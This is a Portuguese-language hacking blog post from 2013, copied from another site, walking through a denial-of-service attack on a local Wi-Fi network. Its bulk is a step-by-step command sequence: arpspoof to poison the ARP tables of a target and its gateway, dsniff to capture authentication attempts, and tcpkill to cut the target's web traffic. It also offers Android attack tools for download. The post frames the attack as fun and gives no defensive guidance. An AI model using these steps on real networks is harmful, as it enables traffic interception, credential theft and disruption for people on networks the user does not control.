segunda-feira, 21 de outubro de 2013

Negação de Serviços em Wifi | Chmod security


 Então Negação de Serviços é um ataque que nunca gostei, mesmo assim é um ataque interessante pois afeta a disponibilidade que é um dos três pilares da segurança da informação. Agora vamos para definição “Um ataque de negação de serviço (também conhecido como DoS Attack, um acrônimo em inglês para Denial of Service), é uma tentativa em tornar os recursos de um sistema indisponíveis para seus utilizadores.  ” wiki , pois bem esse tipo de ataque geralmente é feito em servidores web para que o serviço caiam precisa de uma quantidade considera de pacotes ou requisições para o servidor web fazendo com que ele não suporte e caia, é parecido com o ENEM quando ta faltando 2 dias para terminar as inscrições :) , muita gente acessando o mesmo site ao mesmo tempo nessa caso os brasileiros né que tem o costume de deixar tudo para cima da hora, olha só o estrago que pode acontecer, é como fosse uma “quebra de braço”,  onde quem tiver a Banda Melhor ganha.
ataque-dos

Na imagem a cima podemos observar que um usuário normal manda apenas uma requisição enquanto o atacante manda cetenas de requisições para  o servidor web, ele simula o ultimo dia para se inscrever no ENEM kkk. :D
E como seria um ataque desse em um ambiente local ou interno? estamos falando de uma rede wireless. vamos para nosso laboratório.
vamos utilizar a ferramenta tcpkill, o nome dela já diz né matar as conexões tcp , mas primeiro temos que habilitar o ip_forward como fizemos lá no tutorial de “capturar credenciais” quem não viu ainda voltar e ver para que serve esse comando.
#echo “1″ /proc/sys/net/ipv4/ip_forward
1
pronto agora podemos continuar.
vamos para o reconhecimento do lab.
então temos:
Maquina alvo: 192.168.0.100
Ip do getway(roteador): 192.168.0.1
agora vamos abrir dois terminais
root#arpspoof -i eth0 -t 192.168.0.1 192.168.0.100
root#arpspoof -i eth0 -t  192.168.0.100 192.168.0.1
arpspoof -> Serve para redirecionar pacotes a partir de um host-alvo (ou todos os hosts).
esta é uma forma extremamente eficaz de sniffing tráfego em um interruptor.
próximo passo vamos usar o dsniff
root:#dsniff -i eth0
detecta automaticamente e minimamente analisa cada
protocolo de aplicação, e só salva os interessante bits, apenas registrando
autenticação única tentativas. completa o TCP/IP remontagem é
fornecidos pela libnids.
e o final onde vamos deixar o serviço com a porta 80 inacessível.
# tcpkill -i eth0 dst 192.168.0.1 and dst port 80
:) , pronto afetamos uns dos pilares de segurança que é a disponibilidade :D  
depois fazer esse tipo de ataque usando também um smartphone com sistema Android  que é ainda mais legal pois é portátil e fácil  manuseio
com a ferramenta DSploit entre outras, porém é preciso rootiar seu aparelho primeiramente se quiser a ferramenta para seu Android é só deixar nos cometários que coloco pra download.:@
talvez colocarei uma categoria para android se a procura pelas ferramentas for maior até uma pagina com as melhores ferramentas para pentest com android.


Creditos : Mharcos Nester.........Retirando Diretamente do site CHMOD SECURITY..:)
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86